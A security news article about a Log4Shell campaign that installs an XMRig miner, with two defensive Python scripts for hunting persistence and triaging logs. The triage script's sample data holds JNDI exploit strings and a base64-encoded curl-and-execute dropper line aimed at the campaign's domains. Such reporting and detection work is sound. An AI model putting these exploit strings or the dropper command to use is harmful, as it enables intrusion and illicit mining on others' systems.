Log4j Strikes Again: New Exploit Deploys Crypto-Mining Malware

Log4Shell (CVE-2021-44228), a critical vulnerability in the Apache Log4j logging library, was reported to Apache on November 24, 2021 and publicly disclosed in December 2021. It has been exploited by a wide range of threat actors ever since.

The flaw allows unauthenticated remote code execution: a JNDI lookup embedded in any string the application logs is resolved by Log4j, which fetches and runs attacker-supplied code. Because the library is embedded in countless Java applications and services, it became a prime target for exploitation.

Nation-state actors, cybercriminals, and opportunistic hackers, including groups such as APT41 and Conti, have leveraged Log4Shell for data theft, espionage, and ransomware attacks.

In July 2024, a Confluence honeypot operated by Datadog recorded an attempt to exploit Log4Shell from a Tor exit node with the IP address 185.220.101[.]34.

Further analysis showed that the attackers were exploiting Log4Shell to install the XMRig cryptocurrency miner on the systems they compromised.

The campaign, whose only goal is profit from illicit mining, shows that opportunistic actors continue to exploit this years-old vulnerability for financial gain.

Attack flow

The attackers exploit the Log4j vulnerability for initial access. Because it gives them arbitrary code execution on the target, they use it to download a malicious Java class from a remote server and execute it.

That Java class creates a file at /tmp/lte, downloads a second-stage payload from a remote server into that path, marks it executable, and runs it. This is the stage that actually installs the malware on the target system.

The file written to /tmp/lte is an obfuscated Bash script served from http://nfdo.shop/lte. When executed, it first performs reconnaissance on the host's memory and CPU resources.

It then downloads an XMRig cryptocurrency miner from http://nfdo.shop/componist and configures it to mine Monero on the cmpnst.info pool. Finally, the script establishes persistence, creating a systemd service or a cron job depending on the privileges it runs with and what the system offers, so the miner keeps running after a reboot.
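The systemd-or-cron persistence described above is what a responder should look for on any host that could have logged the exploit string. The following is an added example for this article, not Datadog's or Cyber Press's tooling: it walks the usual cron and systemd locations and flags lines that reference the dropped binaries and domains named in the report, or that launch anything from a world-writable temp directory. DEFAULT_ROOTS and the sample tree created by build_sample_tree() are assumptions for illustration.

```python
"""Hunt for the persistence the dropper leaves behind: cron jobs and systemd units that
launch the campaign's binaries, or anything at all from a world-writable temp directory.

Added example for this article, not Datadog's or Cyber Press's tooling. The IoC paths and
domains are the ones named in the report; DEFAULT_ROOTS and the sample tree built by
build_sample_tree() are assumptions for illustration."""
import os
import re
import tempfile

# Dropped binaries and infrastructure named in the article.
IOC_PATTERN = re.compile(
    r"/tmp/lte|/bin/rcd|/bin/componist|/bin/nfdo|nfdo\.shop|cmpnst\.info|superr\.buzz|rirosh\.shop")
# A cron line (five fields or @reboot) or a systemd Exec* directive running from a temp dir:
# suspicious regardless of whether the name is on any IoC list.
CRON_TMP = re.compile(r"^\s*(?:@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+.*(?:/tmp/|/var/tmp/|/dev/shm/)")
UNIT_TMP = re.compile(r"^\s*Exec\w*=.*(?:/tmp/|/var/tmp/|/dev/shm/)")

# Where cron jobs and systemd units live on a typical Linux host (root and per-user);
# assumed layout, adjust for your distribution.
DEFAULT_ROOTS = ["/etc/crontab", "/etc/cron.d", "/var/spool/cron", "/etc/systemd/system",
                 "/run/systemd/system", os.path.expanduser("~/.config/systemd/user")]


def scan_text(path, text):
    """Return (path, lineno, kind, line) for every suspicious line in one file."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if IOC_PATTERN.search(line):
            hits.append((path, n, "ioc", line.strip()))
        elif CRON_TMP.search(line) or UNIT_TMP.search(line):
            hits.append((path, n, "tmp-exec", line.strip()))
    return hits


def hunt_persistence(roots=DEFAULT_ROOTS):
    """Walk every root (file or directory) and collect suspicious cron/systemd lines."""
    hits = []
    for root in roots:
        if os.path.isfile(root):
            files = [root]
        elif os.path.isdir(root):
            files = [os.path.join(d, f) for d, _, names in os.walk(root) for f in names]
        else:
            continue  # missing root, e.g. no per-user units on this host
        for path in files:
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_text(path, fh.read()))
            except OSError:
                continue
    return hits


def build_sample_tree():
    """Constructed sample: a cron.d entry for the miner, a unit launching from /tmp, and
    a benign unit. Returns the roots to hand to hunt_persistence()."""
    base = tempfile.mkdtemp(prefix="log4shell-hunt-")
    files = {
        "cron.d/componist": "*/5 * * * * root /bin/componist >/dev/null 2>&1\n",
        "system/lte.service": "[Service]\nExecStart=/tmp/.x/miner --donate-level 0\n",
        "system/ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    }
    for rel, content in files.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return [os.path.join(base, "cron.d"), os.path.join(base, "system"),
            os.path.join(base, "nonexistent")]


if __name__ == "__main__":
    for path, n, kind, line in hunt_persistence(build_sample_tree()):
        print(f"{kind:8} {path}:{n}: {line}")
```

Run it without arguments as root to sweep the real DEFAULT_ROOTS; the "tmp-exec" class deliberately ignores the IoC list, because the same dropper can be re-hosted under a new name while the habit of executing from /tmp stays.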

Figure: Base64 content of the script

The base64-encoded portion of the script establishes a reverse shell using Perl and Netcat and configures backdoors on multiple ports for remote control; its persistence mechanism relies on GPG encryption with a passphrase.

It then collects detailed system information, including CPU details, OS version, user information, network connections, and running processes, and sends it to a remote server in an HTTP POST request.

In summary, a system was potentially compromised through the Log4Shell vulnerability (CVE-2021-44228) from the IP address 185.220.101[.]34. The attacker's exploitation payloads referenced the domains superr.buzz, cmpnst.info, nfdo.shop, and rirosh.shop.

According to Datadog, file writes were attempted at /tmp/lte, /bin/rcd, /bin/componist, and /bin/nfdo, consistent with installing the malware and maintaining persistence on the system.
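The attack flow above (JNDI lookup in a logged string, Java class, base64-wrapped dropper to /tmp/lte) and the indicators just listed are what a detection should key on. The following is an added example for this article, not Datadog's or Cyber Press's tooling: it normalises the nested-lookup obfuscation that Log4Shell scanners commonly use, extracts the callback host, decodes any base64 blob in the line, and matches the results against the report's IoCs. The IoC values are the ones named in the article; the four lines in SAMPLE_LOGS are constructed, not captured from the honeypot.

```python
"""Triage log lines for Log4Shell (CVE-2021-44228) exploitation attempts and for the
IoCs of the XMRig campaign described above.

Added example for this article, not Datadog's or Cyber Press's tooling. The IoC values
are the ones named in the report; the log lines in SAMPLE_LOGS are constructed."""
import base64
import binascii
import re

# Attacker source, callback/payload domains and dropped files named in the article.
IOC_IPS = {"185.220.101.34"}
IOC_DOMAINS = {"superr.buzz", "cmpnst.info", "nfdo.shop", "rirosh.shop"}
IOC_PATHS = {"/tmp/lte", "/bin/rcd", "/bin/componist", "/bin/nfdo"}

# One layer of Log4j lookup obfuscation: ${lower:j}, ${upper:N}, ${::-j}, ${env:NOPE:-j}.
# ${jndi:...} is deliberately not matched, so the real lookup survives normalisation.
_WRAPPER = re.compile(r"\$\{(?:[^{}]*:-|(?:lower|upper):)([^{}]*)\}")
# The de-obfuscated lookup: scheme (ldap, ldaps, rmi, dns, ...), host and optional port.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)(?::(\d+))?")
# Base64 runs long enough to hide a dropper command ("echo ... | base64 -d | sh").
_B64 = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def normalize_lookups(s):
    """Peel nested lookup wrappers until nothing changes, then lowercase."""
    prev = None
    while prev != s:
        prev, s = s, _WRAPPER.sub(lambda m: m.group(1), s)
    return s.lower()


def decode_b64_blobs(s):
    """Return the printable decodings of every base64 run in the line."""
    out = []
    for blob in _B64.findall(s):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            out.append(text)
    return out


def analyze(line):
    """Classify one log line; the result is what an analyst would pivot on."""
    norm = normalize_lookups(line)
    finding = {"jndi": False, "scheme": None, "host": None, "port": None,
               "obfuscated": False, "ioc_hosts": set(), "ioc_paths": set()}
    m = _JNDI.search(norm)
    if m:
        finding.update(jndi=True, scheme=m.group(1), host=m.group(2), port=m.group(3),
                       obfuscated="${jndi:" not in line.lower())
    # Scan the normalised line plus any decoded base64 for known infrastructure and drop paths.
    for text in [norm] + [t.lower() for t in decode_b64_blobs(line)]:
        finding["ioc_hosts"].update(h for h in IOC_IPS | IOC_DOMAINS if h in text)
        finding["ioc_paths"].update(p for p in IOC_PATHS if p in text)
    return finding


def triage(lines):
    """Return (index, finding) for every line that shows a JNDI lookup or a known IoC."""
    hits = []
    for i, line in enumerate(lines):
        f = analyze(line)
        if f["jndi"] or f["ioc_hosts"] or f["ioc_paths"]:
            hits.append((i, f))
    return hits


# Constructed samples: three Confluence access-log lines (a plain exploit string, an
# obfuscated one, and benign traffic) and one audited shell command carrying a base64 dropper.
SAMPLE_LOGS = [
    '185.220.101.34 - - [15/Jul/2024:10:21:07 +0000] "GET /login.action HTTP/1.1" 200 512 '
    '"-" "${jndi:ldap://superr.buzz:1389/a}"',
    '203.0.113.9 - - [15/Jul/2024:10:22:41 +0000] "GET /login.action HTTP/1.1" 200 512 '
    '"-" "${${lower:j}${upper:n}di:${::-l}${env:NaN:-d}ap://rirosh.shop:1389/x}"',
    '198.51.100.7 - - [15/Jul/2024:10:23:02 +0000] "GET /index.html HTTP/1.1" 200 1024 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    "sh -c 'echo " + base64.b64encode(
        b"curl -s http://nfdo.shop/lte -o /tmp/lte; chmod +x /tmp/lte; /tmp/lte").decode()
    + " | base64 -d | sh'",
]

if __name__ == "__main__":
    for i, f in triage(SAMPLE_LOGS):
        print(i, f)
```

Matching on the literal "${jndi:" alone misses the second sample; normalising the wrappers first is what makes the obfuscated variant and the plain one land in the same detection, and the callback host it extracts is the pivot for blocking and for searching the rest of the estate.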

Kaaviya is a Security Editor and fellow reporter with Cyber Press (https://cyberpress.org/). She covers cyber security incidents happening in cyberspace.
